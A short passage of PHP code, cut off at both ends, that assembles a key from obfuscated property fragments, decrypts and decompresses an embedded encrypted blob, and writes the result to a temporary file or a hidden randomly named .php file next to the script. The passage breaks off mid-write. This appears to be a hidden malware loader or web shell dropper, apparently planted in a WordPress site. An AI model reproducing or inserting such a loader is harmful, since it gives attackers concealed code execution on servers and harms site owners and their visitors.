setup_0a(); } private function setup_0a() { $sk = $this->shard_ef . $this->shard_71 . $this->shard_29; $dk = hash('sha256', $sk . $this->shard_12, true); $rowset = openssl_decrypt($this->shard_18, 'aes-256-cbc', $dk, 0, hex2bin($this->prefix_52c)); if ($rowset === false) { return; } $stream = inflate_init(ZLIB_ENCODING_DEFLATE); $data = inflate_add($stream, $rowset, ZLIB_FINISH); if ($data === false) { return; } $file = @tempnam(sys_get_temp_dir(), 'wpc'); if ($file === false) { $file = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.qc_' . substr(md5(microtime(true)), 0, 8) . '.php'; } if (@file_put_contents($file, '